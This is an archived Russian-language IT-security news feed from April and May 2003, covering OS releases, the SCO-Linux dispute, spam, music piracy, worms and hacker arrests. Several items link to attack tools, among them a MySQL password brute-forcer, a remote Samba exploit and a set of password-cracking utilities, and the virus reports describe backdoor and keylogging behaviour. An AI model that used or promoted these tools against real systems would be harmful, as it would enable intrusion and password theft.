Jason Ish обновил redhat/base OpenBSD порт с RedHat 6.2 на RedHat 8.0: "Я обновил redhat/base порт с RedHat 6.2 на RedHat 8.0. Протестировал его с браузерами Opera и Netscape. Моей основной целью является желание предоставить людям возможность продолжать использовать приложения, с которыми они работают сейчас. Если вы запускаете какие-либо Linux-приложения, я буду рад любой помощи в тестировании." Сообщение взято из списка рассылки *nixp. Подробности - http://www.bsdforums.org
4/05/2003 12:17 Хакеры приложили руку к новой версии Windows.
На презентации Microsoft Windows Server 2003 в Лондоне ZDNet UK взяла интервью у Роберта Шорта (Rob Short), вице-президента отделения Windows Core Technology. Шорт, отвечающий за общее техническое обеспечение и управление ядром Windows, говорил о том, что отличает Windows Server 2003 от предыдущих продуктов Windows, в чем Unix и Linux по-прежнему сохраняют преимущество, а также о хакерах, совместимости приложений, производительности и надежности. Особенно понравился ответ на вопрос, связанный с патчами ОС семейства Win. "Пока поправки все еще выходят довольно часто. Мы работаем по нескольким направлениям. Мы следим за поправками. Во многих случаях мы следим за атаками, и мы следим за всем остальным кодом по всей системе, проверяя, может ли данная атака сработать еще где-нибудь. Для [Windows Server] 2003 мы создали механизм поправок, который будет поставляться отдельно. Две трети компонентов мы сможем исправлять, не отключая системы. Это область, в которой разработчики Unix нас опережают – а именно в том, как у них делается переадресация: они могут заменить файл исправленным, а затем перевести на него символическую ссылку. С этим у нас проблема, но мы устраним ее в ближайшем будущем". Хотелось бы надеяться, что это правда. Впрочем, время покажет. Интервью - http://www.zdnet.ru/?ID=300364
4/05/2003 12:04 SCO Group умудрилась обнаружить в ядре Linux свой код.
Как сообщается на linux.org.ru, Darl McBride сделал своё очередное амбициозное заявление. На этот раз оно касалось ядра Linux. В этом заявлении говорится о том, что SCO умудрилось обнаружить в ядре "места построчно совпадающие с кодом из UnixWare", и что еще более примечательно "...код, который, судя по всему, был искажен, чтобы не походить на UnixWare". Так, что если раньше они обвиняли Suse и Red Hat которые включали в дистрибутив "неправильный" код. Теперь под удар попадают все остальные дистрибутивостроители... Подробности - http://zdnet.com.com/2100-1104_2-999371.html
4/05/2003 11:58 Очень полезный сайт различных утилит.
Обнаружился тут в Интернете довольно любопытный сайт, на котором выложена подборка утилит, основное предназначение которых - взлом (подборка) паролей для различных программ - Word, Excel, Outlook Express, Protected Storage Area в ОС Windows. Также приятно то, что все утилиты являются абсолютно фриварными. Также на сайте имеется (как написано на заглавной странице) набор исходных кодов очень полезных Виндоуз-утилит, написанных на Visual Басике, а также набор ActiveX - компонент. Сайт - http://nirsoft.cjb.net/
3/05/2003 15:24 Microsoft против использования СУБД Visual Fox Pro в Linux.
Корпорация Microsoft настаивает на том, что ее СУБД Visual Fox Pro не может использоваться в среде Linux без нарушения лицензионного соглашения. Ранее согфтверный гигант запретил программисту Уилу Хенцену провести демонстрацию работы Visual Fox Pro ссылаясь на то, что такая демонстрация нарушает условия пользовательского лицензионного соглашения. Позднее менеджер Microsoft по Fox Pro Кен Леви (Ken Levy) опубликовал заявление, в котором объявляет нарушением лицензионного соглашения использования ряда библиотек Fox Pro под Linux. Запрет распространяется на библиотеки, которые поставляются вместе со средой разработки и могут включаться в готовые приложения. Оппоненты Леви полагают, что он перегибает палку. В лицензионном соглашении нет прямого запрета на использование Fox Pro под Linux. Систему нельзя использовать лишь для разработки и тестирования продуктов, не предназначенных для Windows. Если же готовый продукт должен работать в Windows, то создавать его можно в любой среде. И хотя смысла в разработке Windows-приложений в других ОС маловато, это оставляет лазейку, которую можно интерпретировать как разрешение на использование Fox Pro в любой ОС. Подробности - http://gotdotnet.com/team/vfp/vfp_eula_runtime.txt
3/05/2003 14:15 Война со спамом: фронт ширится.
Проблему спама, как никогда остро проявившуюся за последние полгода, заметили и власти США. Федеральная комиссия по торговле решила организовать в Вашингтоне с 30 апреля по 2 мая специальную конференцию, посвященную спаму и возможным путям обуздания постоянно растущей лавины нежелательных коммерческих писем. О своем участии в конференции и планируемой координации своих действий по обнаружению злостных спамеров уже объявили America Online, Microsoft и Yahoo Inc. Не столь значительные игроки рынка высоких технологий собираются использовать конференцию в качестве трибуны для анонса своих новых продуктов, так или иначе направленных на борьбу со спамом. Намечаются и правовые новости: два неназванных законодателя намереваются представить свой вариант уже обсуждаемого в парламенте США законопроекта, обязывающего спамеров указывать в письме реальный обратный адрес и неукоснительно подчиняться требованию получателя исключить его e-mail из списка рассылки. Надо отметить, что хоть более половины штатов США уже и приняли различные антиспамерские законы, все предыдущие попытки провести нечто подобное через Конгресс натыкались на активное сопротивление сторонников "прямого маркетинга" (то есть, рассылки рекламы через электронную почту) и заканчивались неудачей. Однако теперь уже сами сторонники подобной рекламы испугались. Уж слишком велики объемы спама, слишком быстро они растут, делая сам принцип подобной рекламы неэффективным: немногочисленные "честные" спамеры могут легко потеряться в этой лавине, их послания будут отправляться пользователями в мусор, блокироваться в "черных списках" вместе со всеми остальными. Таким образом, впервые в истории США образовались благоприятные условия для принятия базовых нормативных актов, регулирующих рекламу через электронную почту. Правда, жителям России с этого вряд ли что-то перепадет, кроме очередного заграничного опыта. Исчтоник - http://www.viruslist.ru
3/05/2003 13:13 Новый "Закон о СМИ" упразднит регистрацию интернет-изданий.
На сайте Минпечати опубликован проект федерального закона "О средствах массовой информации". Новый документ имеет ряд существенных отличий от ныне действующего закона, который был принят еще в 1991 году. В частности, в законопроект включена глава, которая регламентирует работу онлайновых СМИ, а так же интернет-версий традиционных медиа. Согласно законопроекту, онлайновые версии СМИ являются одной из форм распространения традиционных средств массовой информации - такой же как подписка или продажа в розницу. Новый проект закона отменяет регистрацию интернет-изданий в Министерстве печати. В том случае, если законопроект будет принят, для получения лицензии на информационный интернет-ресурс достаточно будет просто уведомить Минпечати о начале работы онлайнового СМИ. Подробности - http://www.mptr.ru/user/index.cfm?tpc_type=2&msg_id=1891&tpc_id=3
3/05/2003 12:11 Компании звукозаписи задумали диверсию против пиратов.
Крупнейшие мировые звукозаписывающие компании, такие как Universal Music, Warner Music, Sony Music, BMG и EMI негласно финансируют разработку специальных компьютерных программ, цель которых - мешать работе компьютеров и замедлять интернет-соединения тех, кто незаконно скачивает музыку из Интернета, сообщает газета The New York Times. По информации газеты, звукозаписывающие компании изучают возможности применения различных средств для предотвращения аудиопиратства, таких как сокращение скорости интернет-соединения у пользователя Сети, скачивающего музыку, или выкладывание в сеть файлов, которые, маскируясь под аудиофайлы, на самом деле являются подобием вирусов. Разработка подобных технологий ведется в секрете. Как сообщает газета, разработка соответствующего программного обеспечения поручена нескольким небольшим компаниям. Если находящиеся в разработке новые средства будут применены, это станет самой агрессивной атакой против аудиопиратов в истории звукозаписи. До сих пор звукозаписывающие компании в основном ограничивались подачей исков против отдельных граждан, имели место также попытки применить некоторые технологические меры против нарушителей закона об авторских правах. Так, на некоторые веб-узлы, занимающиеся обменом аудио- и видеофайлами было выложено некоторое количество фальшивых музыкальных файлов. Такая технология, являющаяся вполне законной и получившая название spoofing, заметных результатов не принесла. Подробнее - http://www.lenta.ru/internet/2003/05/04/bullet/
3/05/2003 00:50 Ещё раз про Центр Разговорного Английского.
То ли это чья-то шутка (довольно остроумная кстати), то ли Центр Разговорного Английского действительно всех достал, но на сайте JOB.RU Повяилось довольно любопытное сообщение следующего содержания: "29.04.2003 11:14:45 | Должность: системный администратор, Город: Москва, Пол: Не имеет значения, Образование: Не имеет значения, Опыт работы: 3 года, Занятость: Любая. ЦЕНТРУ РАЗГОВОРНОГО АНГЛИЙСКОГО требуется системный администратор с опытом работы по отражению хакерских атак из интренета. Контактное лицо: American Language Center Телефон: 238-33-86 / 778-9894 / 411-0232. :) Никто не имеет желания попытать счастья? ;) Источник - http://www.job.ru/searchvac.jsp?mode=findVacance&submode=find&findVacanceForm_id=2016813
2/05/2003 13:42 Настройка анти-спамого email gateway под OpenBSD.
Подробная статья по настройке анти-спамого email gateway под операционной системой OpenBSD с помощью SpamAssassin. Помимо обычных возможностей, будет предоставляться текст и статистический анализ SpamAssassin, online проверка базы данных SPAM'а с помощью Razor и DCC. О новости сообщил SHuRuP c nixp.ru. Статья - http://lawmonkey.org/anti-spam.html
2/05/2003 12:08 Bootable Floppy Disk Creator for Active@ KillDisk.
Маленькая, бесплатная программка для капитального уничтожения всех данных с винта. Обычно, для уничтожения данных использует стандартные досовые утилиты или команды, вроде FDISK, FORMAT и DELETE. После чего, юзер обыкновенный мнит, что вся инфа была полностью удалена. Но действительность как обычно суровее - почти любой может восстановить удаленные файлы с жесткого или переносимого драйва. Ну, а для того, чтоб уничтожить усю инфу наверняка, используйте Active@ KillDisk. Скачиваем прогу, вставляем чистую дискету и при непредвиденных обстоятельствах загружаемся именно с неё :) Программа - http://www.killdisk.com/downloads/killdiskfloppysetup.exe
2/05/2003 11:03 Подборщик паролей MySQL.
Опубликован исходный код бруте-форс подборщика паролей для взлома перехваченного хэша пароля СУБД MySQL. Как написано в коментарии, позволяет взлома хэш 8-символьного пароля из печатаемых ASCII-символов в течении нескольких часов. Исходник - http://packetstorm.linuxsecurity.com/Crackers/msqlfast.c
2/05/2003 10:48 Эксплоит удалённой уязвимости в Samba.
Опубликован эксплоит, позволяющий удалённо сломать сервер Samba 2.2.x. Выпущен c0wboy из www.0x333.org. Эксплоит - http://packetstorm.linuxsecurity.com/0304-exploits/0x333hate.c
2/05/2003 10:28 Выход OpenBSD 3.3.
1 мая был проанонсирован выпуск новой версии операционной системы OpenBSD - 3.3. Загрузить новую версию можно с нескольких зекал FTP, список которых приводится в пресс-релизе. среди новшеств в новой версии - инструмент защиты стека в компиляторе ProPolice, поддержка очереди в pf (ограничитель трафика), разделение привилегий X-cервера c xconsol, уменьшенное количество SUID-бинарников, новый инструмент для борьбы со спамом и многое другое. Сообщается, что команда разработчиков гордится тем, что за 7 лет была обнаружена только одна удалённая дыра в дефолтной инсталляции. Дерево портов и пакетов построено Christian Weisgerber, David Lebel и Peter Valchev. Система построена Theo de Raadt, Henning Brauer, Todd Fries и Miod Vallat. Подробности - http://www.linuxsecurity.com/articles/vendors_products_article-7194.html
2/05/2003 09:55 Subscribe.Ru подвергся атаке спамеров.
Компания Internet Projects сообщила о случаях стилизации спамерских писем под рассылки сервиса почтовых рассылок Subscribe.Ru. Повысить доверие к своей «рекламе» спамеры решили с помощью замены строки в поле письма «От», куда был проставлен отправитель с именем «Subscribe.Ru» и почтовым адресом namma@subscribe.ru. Цели спамеров, овладевающих все новыми, еще более нецивилизованными приемами, предельно ясны. «Рассылая письма „от имени“ информационного канала Subscribe.Ru, они надеются повысить „эффективность“ своих массовых писем за счет доверия пользователей к известному сервису почтовых рассылок. С другой стороны, спамеры надеются, что подрыв этого авторитета поможет спаму отвоевать часть рынка у цивилизованного e-mail маркетинга, основанного на системе подписки», — говорят представители Internet Projects. Теперь, что исключить случаи стилизации спамерских писем под рассылки Subscribe.Ru, компания Internet Projects вводит для каждого подписчика свой уникальный идентификационный номер, который указывается и в поле письма «От», и в поле «Кому». «Это делает бессмысленным подстановку любых „общих адресов Subscribe.Ru“ в массовые спамерские письма, так как такая неудачная „стилизация“ будет очевидна любому пользователю. Такие спамерские „подделки“ будут легко узнаваемы, явно отличимы от нужной электронной корреспонденции, что позволит соответствующим образом настроить фильтры почтовой системы», — говорится в пресс-релизе Subscribe.Ru. Подробности - http://www.webplanet.ru/news/company/2003/4/28/subscribe_spam.html
2/05/2003 09:33 RIAA запугивает пиратов через аську.
Звукозаписывающая индустрия открыла новый фронт в войне против онлайнового пиратства. В среду сотни тысяч пользователей музыкальных файлообменных служб были неприятно удивлены, получив через свои системы интернет – пейджинга мгновенное сообщение от RIAA. В своем общении RIAA предупреждала о том, что ей не составляет никаких проблем идентифицировать каждого пользователя пиратской продукции, а также сообщала о возможных юридических последствиях, если те не прекратят скачивать нелегальную музыку из Сети, сообщает Wired. «Во вторник мгновенное сообщение от RIAA получили примерно 200 000 пользователей файлообменных служб Grokster и Kazaa. Более того, Ассоциация звукозаписывающей индустрии намерена разослать еще 1 млн. мгновенных сообщений в течение этой недели», - сообщил президент RIAA Кари Шерман. В предупреждении, разосланном от имени ведущих музыкальных лейблов в частности говориться: «Когда вы предлагаете другим пользователям скачать из своего компьютера защищенную авторскими правами музыку вы нарушаете закон. А нарушение закона влечет за собой неминуемую юридическую ответственность и штрафы. Есть простой путь избежать этого риска – НЕ КРАДИТЕ МУЗЫКУ!». RIAA также разъясняет пользователем, что под словом «кража» она также подразумевает передачу музыкальных файлов другим пользователям или участие в пиринговых сетях. «Если вы предлагаете скачать музыку через вышеназванные файлообменные системы, в раскрываете свою анонимность и можете быть легко идентифицированы», - устрашают представители RIAA. Подробнее - http://www.internet.ru/mainnews/n_c962.esp
2/05/2003 09:08 Сепаратистский сайт "Кавказ-Центр" снова сменит прописку.
С 30 пареля закрыт доступ к сайту чеченских сепаратистов "Кавказ-Центр", который располагался на сервере эстонской фирмы "Старман". По словам представителя этой компании, сайт был закрыт после того, как их "коммерческий клиент" сам расторг договор об аренде сервера. Накануне глава эстонского правительства Юхан Партс заявил, что власти страны не будут вмешиваться в деятельность сайта, поскольку он, как выразился премьер, "находится не на сервере кабинета министров. В то же время он заверил, что "если сайт нарушит закон, то соответствующие ведомства в Эстонии восстановят законность". МИД России в понедельник выразил надежду, что Эстония примет необходимые меры для пресечения деятельности чеченского сайта. "Рассчитываем, что эстонские власти, неоднократно декларировавшие готовность внести вклад в кампанию борьбы с международным терроризмом, предпримут необходимые меры для пресечения подобный деятельности на своей территории", - заявил МИД России. Исчтоник - http://www.itar.tass.ru/different/hotnews/russian/290346.html
2/05/2003 08:44 Книга "Система доменных имён".
На сайте info.nic.ru, представляющем собой информационный ресурс о распределении адресного пространства сети Интернет, опубликована книга П.Б.Храмцова "Система доменных имён". Как следует из названия, посвящена она описанию технологии работы сервиса DNS, предназначенного для разрешения соответствия FQDN-адресов в IP-адреса и наоборот. Описана настройка реализации DNS от Беркли - BIND. Приведены типичные конфигурации зон и файлов конфигурации BIND, а также утилит и инструментов для проверки корректности функционирования DNS-сервера. Рекомендуется к ознакомлению системным администраторам, особенно начального уровня. Книга - http://info.nic.ru/st/8/out_267.shtml
1/05/2003 16:39 Безопасная реализация TCP/IP.
Как сообщает bugtraq.ru, LynuxWorks (TM) анонсировала реализацию стека TCP/IP для критичных (с точки зрения безопасности) приложений. Реализация соответствует DO-178B Level A - стандарту де-факто, разработанному Radio Technical Commission for Aeronautics (http://www.rtca.org/). Источник - http://www.lynuxworks.com/corporate/news/press/2003/042303b.php3
1/05/2003 15:36 Надежно, но медленно или быстро, но с "дырами".
Как сообщает www.virulist.ru, "заплатка", устраняющая ряд уязвимостей в ядре сразу нескольких ОС от Microsoft, иногда приводит к заметному снижению производительности компьютеров, работающих под управлением Windows XP SP1. Решение у проблемы пока отсутствует. Microsoft уверяет, что работы над ее устранением ведутся самым активнейшим образом. Пользователям Windows XP SP1 (каковых, в общем-то, "легион") рекомендуется подумать, стоит ли вообще устанавливать эту "заплатку"? И если вы решили, что стоит, то придется терпеть "тормоза" и ждать обновленную версию патча вместе со всеми остальными. Подробности - http://support.microsoft.com/?kbid=819634
1/05/2003 14:03 В 2002 году интернет-мошенники обманули 42 тысячи американцев.
За 2002 год в США более 42 тысяч пользователей Интернета стали жертвами сетевых мошенников, а ущерб от действий интернет-жуликов составил 54 миллионов долларов. Об этом говорится в исследовании, которое было проведено американским Центром по борьбе с интернет-мошенничеством (The Internet Fraud Complaint Center), сообщает Washington Profile. По данным исследователей, 46 процентов обманутых пользователей пострадали от действий организаторов фальшивых интернет-аукционов; в 31 случае из ста клиенты онлайн-магазинов не получали товар, заказанный с предоплатой; 12 процентов сетевых преступлений были связаны с кражей информации о кредитных карточках. Самые большие убытки понесли доверчивые пользователи, которые "купились" на так называемые "нигерийские письма": мошенники обращались к потенциальной жертве с предложением принять участие в эвакуации миллионных состояний из Нигерии и затем поделить добычу. Для того чтобы получить миллионы долларов, нужно было только перечислить на счет преступников "скромный" взнос. В среднем, каждый американец, откликнувшийся на подобное предложение, потерял 3800 долларов. Подробности - http://www.lenta.ru
1/05/2003 13:30 Арестован хакер Fluffi Bunni, за которым ФБР и Скотланд-Ярд гонялись три года.
Британские правоохранительные органы арестовали 24-летнего Линна Хтуна (Lynn Htun), который, как предполагается, с лета 2000 года организовывал массовые хакерские атаки на тысячи различных сайтов по всему миру, сообщает Associated Press. Атаки проводились от имени персонажа по прозвищу Fluffi Bunni - плюшевого кролика розового цвета, изображение которого размещалось на взламываемых сайтах. Предположительно, задержанный Хтун действовал не в одиночку, а возглавлял целую группу злоумышленников. По оценкам следствия, Хтун является специалистом очень высокой квалификации, так как среди взломанных под его руководством сайтов - сайты ведущих мировых организаций, занимающихся компьютерной безопасностью. Такие взломы группа Хтуна обозначала лозунгом "Fluffi Bunni ownz you" ("пушистый кролик вас имел"). Действия группы Fluffi Bunni привлекли внимание ФБР США в ноябре 2001 года, после терактов 11 сентября, когда на взломанных сайтах стали появляться лозунги "Fluffi Bunni Goes Jihad" ("пушистый кролик идёт на джихад"). Это позволило квалифицировать их действия как протест против американской глобальной кампании по борьбе с терроризмом. Хтун был арестован в Лондоне на выставке для специалистов по компьютерной безопасности InfoSecurity Europe 2003. Подробности - http://lenta.ru/internet/2003/04/30/bunny/
1/05/2003 12:18 Вирусная «зачистка» подорожала.
Количество зараженных вирусами компьютеров перестало расти, но опасные программы, блуждающие по интернету, по-прежнему представляют большую угрозу. Доклад на эту тему, основанный на данных компании ICSA Labs, был обнародован в ходе прошедшей в Лондоне выставки, посвященной системам компьютерной безопасности. Согласно недавно проведенному исследованию, количество зараженных ПК на тысячу компьютеров в течение 2002 года практически не изменилось. Но на ликвидацию последствий заражения в прошлом году было потрачено больше времени и денег, чем когда бы то ни было. Это можно объяснить тем, что вирусы нового поколения наносят гораздо больший ущерб, чем их «предки»: стирают данные, перегружают сети и блокируют почтовые серверы. Размер понесенного ущерба заставляет многие компании в дальнейшем устанавливать новую технику и программное обеспечение для борьбы с вирусами. Пользователи интернета и электронной почты сталкиваются с компьютерными вирусами почти ежедневно. Согласно данным ICSA Labs, в 2002 году в среднем ежемесячно проблемы с вирусами возникали у 105 компьютеров из тысячи. В 2001 году эта цифра не превышала 103, а всего пять лет назад речь шла лишь о 32 зараженных компьютерах на тысячу в месяц. Однако, по мнению одного из авторов доклада Ларри Бридвелла, снижение темпов роста распространения вируса преждевременно рассматривать как позитивную тенденцию. Подробности - http://www.bbc.co.uk/
1/05/2003 11:26 2/3 спама рассылают жулики.
2/3 электронных писем, приходящих от спамеров, содержат ложную информацию и пишутся с целью мошенничества. К такому выводу пришла Федеральная комиссия по торговле США (FTC) в результате проведенного исследования. Данный показатель выглядит еще более удручающим, если учитывать, что по статистике спамом является почти половина приходящих американцам писем. Россиянам повезло ничуть не больше - к примеру, почти 80% присылаемых в редакцию CNews.ru электронных писем – назойливый спам. В ходе исследования FTC была изучена 1 тыс. писем, выбранная случайным образом из корреспонденции за последние 6 месяцев 2002 года. Оказалось, что 66% посланий содержит заведомо ложную информацию в строках «Отправитель» и «Тема», либо сам текст письма написан явными мошенниками. Выяснилось, что примерно половина спамеров предпочитает не пользоваться никакими именами, указывая в поле «Отправитель» невразумительную информацию. 33% процента отправителей непрошеных писем используют данное поле для привлечения внимания получателя с целью дальнейшего обмана. Поле «Тема» также активно используется мошенниками. 22% писем содержат ложную информацию в заголовке, при этом 42% спамеров стремятся создать у получателей их «творчества» иллюзию того, что письмо написано кем-то из знакомых. Чаще всего ложные сведения указываются в полях «Отправитель» и «Тема» в спаме финансового характера. Ложные сведения в этих полях содержит более половины таких писем. Примечательно также, что мошенническими являются 90% всех рекламируемых спамерами инвестиционных и бизнес-возможностей. Кроме того, спамеры стремятся «позаботиться» о здоровье пользователей Сети и об отдыхе - ложную информацию содержит 48% и 47% писем такого рода соответственно. Источник - http://www.cnews.ru
1/05/2003 10:23 Поздравляем всех посетителей нашего сайта с праздником Первого Мая!
Команда UINC поздравляет всех посетителей нашего сайта с праздником Первого Мая! Желаем всем счастья, крепкого здоровья и финансового благополучия! :) Источник - /dev/calendar
30/04/2003 16:20 Oracle выпускает Oracle9i Database Release 2.
“Мы можем обеспечить вычислительную мощь уровня мейнфреймов на дешевом оборудовании” - под таким девизом компания Oracle сделала общедоступным Oracle9i Database Release 2 для 32- и 64-битных ОС Windows Server 2003. Представители компании утверждают, что, благодаря новому релизу, тысячи пользователей получат возможность строить масштабируемые и надежные базы данных на основе ОС Windows, затрачивая при этом средств меньше, чем при использовании Microsoft SQL Server. По утверждению Oracle, кластерная технология Oracle9i Real Application Clusters может позволить производить вычисления класса мэйнфреймов при меньших затратах благодаря тому, что развертывание системы происходит на одном недорогом сервере, а дальнейшее наращивание аппаратной мощи не требует замены ПО. А поддержка как 32-битной, так и 64-битной ОС дает возможность модернизировать серверы без каких-либо задержек. Oracle9i Database Release 2 для 32- и 64-битной ОС Windows Server 2003 доступен для загрузки на Oracle Technology Network. Более подробно - http://otn.oracle.com/
30/04/2003 15:17 Новая версия Windows просочилась в веб.
В веб просочилась более продвинутая опытная версия последователя Windows ХР, и аналитики отмечают, что Microsoft ускорила работу над новой операционной системой. ОС с кодовым названием Longhorn должна дебютировать в конце будущего года или в начале 2005-го. Однако аналитики, изучившие последнюю опытную версию, так называемую Milestone 5, которая просочилась в веб на прошлой неделе, говорят, что Microsoft даже несколько опережает график. Новая тестовая версия чище, чем та, что утекла в Сеть в конце февраля. Теперь, выпустив Windows Server 2003, Microsoft, похоже, быстро переносит ресурсы разработчиков на Longhorn, следующую столбовую версию настольной Windows. Аналитики не ожидали появления этой тестовой версии до июля, а следующей общедоступной бета-версии Longhorn M6 — до октября, когда Microsoft проведет ежегодную конференцию для разработчиков. Ускорение разработки может означать, что операционная система выйдет не в начале 2005-го, а в конце 2004 года. Аналитик Directions on Microsoft Майкл Черри прогнозирует, что, если Microsoft сохранит теперешние темпы разработки, релиз в лучшем случае состоится в конце октября 2004 года. Но если обычный для Microsoft 40-месячный средний интервал между новыми версиями Windows сохранится, Longhorn дебютирует в феврале 2005 года. Microsoft говорила лишь, что операционная система дебютирует в конце 2004 года. Комментарии по поводу последней утечки кода в компании получить не удалось. Источник - http://www.zdnet.ru
30/04/2003 14:13 Microsoft выпустила руководство по обеспечению безопасности Windows.
В пятницу Microsoft выпустила руководство и шаблоны, помогающие администраторам обеспечить безопасность компьютеров, работающих с новейшей операционной системой компании Windows Server 2003. Руководство состоит из документа в формате PDF, в котором излагаются соображения по поводу конфигурирования серверного ПО для разнообразных приложений — от веб-сервера, соединенного с интернетом, до контроллера домена внутренней сети компании. Кроме того, приводятся примеры рекомендуемых Microsoft конфигураций для отдельных приложений. «Существует множество разных параметров настройки, которыми заказчик может манипулировать при установке, например, веб-сервера, — поясняет руководитель программы Windows Server 2003 Майкл Стивенсон. — В руководстве объясняется, почему нужно выбирать те или иные значения параметров». Cправочное руководство по безопасности опубликовано всего через день после официального выпуска серверной ОС Microsoft следующего поколения. В числе прочих материалов оно содержит пояснения, пошаговые инструкции, примеры конфигураций и сценарии для установки восьми разных классов серверов на базе Windows Server 2003. Наряду с руководством по Windows Server 2003, софтверный гигант выпустил еще один комплект документов, озаглавленный «Угрозы и контрмеры» (Threats and Countermeasures). В нем описываются различные варианты защиты, которые можно использовать в Windows 2003 и XP. Справочное руководство - http://go.microsoft.com/fwlink/?LinkId=14845
29/04/2003 09:46 Российский студент-пират признал себя виновным.
19-летний российский студент Игорь Серебряный, задержанный ФБР 2 января в Лос-Анджелесе, признал себя виновным в хищении секретной информации у спутниковой телевизионной компании DirecTV, сообщает Bloomberg News. Согласно информации адвоката студента, в соответствии с условиями судебного соглашения он имеет право на пробацию (условное освобождение на поруки). Российскому студенту грозит лишение свободы сроком до 30 лет. По сведениям ФБР, Серебряный распространил в Интернете техническую информацию, составляющую коммерческую тайну. Речь идет о новой системе защиты телевизионной сети DirecTV. Корпорация Hughes Electronics потратила около 25 миллионов долларов на разработку новой карточной технологии P4 ("Period 4"), обладающей повышенной устойчивостью к взлому и несанкционированному копированию. DirecTV - одна из крупнейших спутниковых телесетей США, имеющая 11 миллионов подписчиков - несет серьезные финансовые потери из-за использования устаревших защитных систем. Источник - http://www.detnews.com/2003/technology/0304/29/technology-149719.htm
28/04/2003 13:43 Cтатья об IPSEC VPN безопасности.
Gary Flynn, инженер по безопасности James Madison University опубликовал статью, посвящённую описанию криптографического протокола IPSEC применительно к организации туннеля VPN (виртуальные частные сети). Полное название статьи "Authentication Configuration Issues Affecting IPSEC VPN Security". Как пишет сам автор, статья появилась после глубокой проработки документации, посвящённой криптографическим протоколам (IPSEC, IKE), применяемых в продуктах фирмы CISCO. Статья - http://www.jmu.edu/computing/security/vpnauth.shtml
28/04/2003 11:41 Интервью начальника управления "К" о киберпреступности.
Россия знаменита своими "компьютерными гениями" - как в позитивном, так и в негативном смысле. Слава о "русских хакерах" гремит на весь мир. При этом российская киберполиция оснащена гораздо хуже своих зарубежных коллег, не говоря уже о своих профессиональных противниках, а о нормальном финансировании и речи не идет. Работа сотрудников отечественной киберполиции имеет мало общего с тем образом высоколобых "борцов с хакерами", который любят изображать в боевиках и детективной литературе. Это обычный труд сыщиков, включающий и агентурную работу, и взаимодействие с другими подразделениями, и многое другое. О том, как в нынешних условиях можно эффективно бороться с киберпреступностью, "Ведомостям" рассказал руководитель столичного Управления "Р" Дмитрий Чепчугов. Интервью - http://www.crime-research.org/news/2003/04/2601.html
28/04/2003 11:03 Недельный отчет о вирусах Panda Software.
Вирусная лаборатория Panda Software подвела итоги вирусной активности за прошедшую предпасхальную неделю. Рассмотрены 4 червя, включая Coronex, а также троянец Alor. Про Coronex, а также о фальшивой шумихе, поднятой СМИ (как бумажными, так и сетевыми) около этого червя мы рассказывали в предыдущих выпусках. Второй червь, представленный в обзоре - Opex, распространяющийся посредством программ обмена файлами P2P KaZaA, eDonkey и Morpheus. Для этого он создает большое количество своих копий в общих папках, используемых по умолчанию, а также в случайной папке из «Моих документов». Имена создаваемых файлов связаны с компьютерными программами, играми, хранителями экрана и т.п. Это приводит к тому, что пользователи загружают копии вируса на свои компьютеры, считая при этом, что они загрузили обычные программы. Третий червь – Tavo - попадает на компьютеры в электронном письме с темой "Saludos" и вложенным файлом "IESRACK.VBS". Также он способен распространяться через дискеты. После заражения компьютера Tavo рассылает себя по всем адресам из адресной книги Outlook. Последним червем сегодняшнего отчета является Morb, быстро распространяющийся по электронной почте, каналам IRC и KaZaA. При заражении компьютера он отвечает на все сообщения папки «Входящие», вставляя в сообщения зараженный файл. Кроме того, Morb заносит на компьютер троянец, открывающий 81 порт и отправляющий сообщения всем пользователям IRC, подключенным к тому же каналу, что и пользователь зараженного компьютера. Троянец Alor позволяет хакеру получать удаленный доступ к пораженному компьютеру с помощью TCP/IP соединения через порт 12345. Хакер, получивший доступ к компьютеру жертвы, может установить пароль на выполнение определенных действий, включая доступ к конфиденциальной информации, хранящейся на компьютере, открытие и закрытие приемного лотка CD-ROM или DVD, а также включение и отключение Планировщика Windows. Более подробно - http://www.viruslab.ru/press/index.php?go=show&num=139
28/04/2003 10:39 Symantec предупреждает о появлении нового червя.
Компания Symantec предупреждает о появлении нового червя. способного шпионить за пользователями компьютеров. Червь, названный W32.HLLW.Kullan, копирует себя в системную папку Windows и, будучи активированным, заражает все компьютеры, доступные в сетевом окружении. Червь содержит целый ряд backdoor-функций: умеет проверять почту, записывать информацию, вводимую с клавиатуры и собирать информацию о конфигурации компьютера и операционной системе. Подробности - http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.kullan.html
28/04/2003 10:15 Три студента арестованы за создание сайта с пиратского музыкой.
Австралийские власти пресекли деятельность группы музыкальных пиратов, которые создали сайт MP3 WMA Land, на котором размещались сотни ссылок на музыкальные произведения в форматах MP3 и Windows Media Audio, а также видеоклипы. Организаторами сайта оказались трое студентов: двое австралийцев и один гражданин Малайзии. Всем пиратам от 19 до 20 лет. Поскольку создатели были студентами, многие из музыкальных файлов хранились на университетских компьютеров. Кроме того, у MP3 WMA Land было свыше десятка зеркал по всему миру. Совокупный ущерб, нанесенный пиратами музыкальной индустрии составляет, по разным оценкам от 37 до 44 млн. долл. США. наибольший ущерб был причинен пяти крупнейшим мировым лейблам: Universal Music, Sony Music Entertainment, Warner Music, BMG, EMI Group, а также австралийской звукозаписывающей компании Festival Mushroom Records. По словам представителя австралийской ассоциации звукозаписывающих компаний, закрытие крупного пиратского сайта является очень большим успехом и является хорошим началом для искоренения пиратства в интернете. Исчтоник - http://www.compulenta.ru
27/04/2003 13:39 PHRACK: история о легендарном журнале.
На сайте bugtraq.ru опубликована довольно интересная статья mindw0rk "PHRACK: история о легендарном журнале", которая, как следует из названия, посвящена описанию этого знаменитого журнала компьютерного андэграунда. Его читают все. Для хакеров он - источник новых знаний и символ свободы, для администраторов - предостережение, справочник предстоящих атак, для сотрудников спецслужб - отличная возможность познакомиться с жизнью по другую сторону баррикад. Он объединяет миллионы людей по всему миру. Тех, кто интересуется компьютерной безопасностью и хакерским андеграундом, кому не безразличны передовые технологии, и просто людей, желающих получить удовольствие от чтения действительно качественного журнала. Сделанного людьми и для людей, не тронутого коммерческой грязью. Журнала, имеющего долгую историю, ставшего поистине легендарным в узких кругах. Журнала под названием Phrack. Статья - http://www.bugtraq.ru/library/misc/phrack.html
27/04/2003 13:08 Хакеры задефейсили 1500 сайтов Bargainhost.
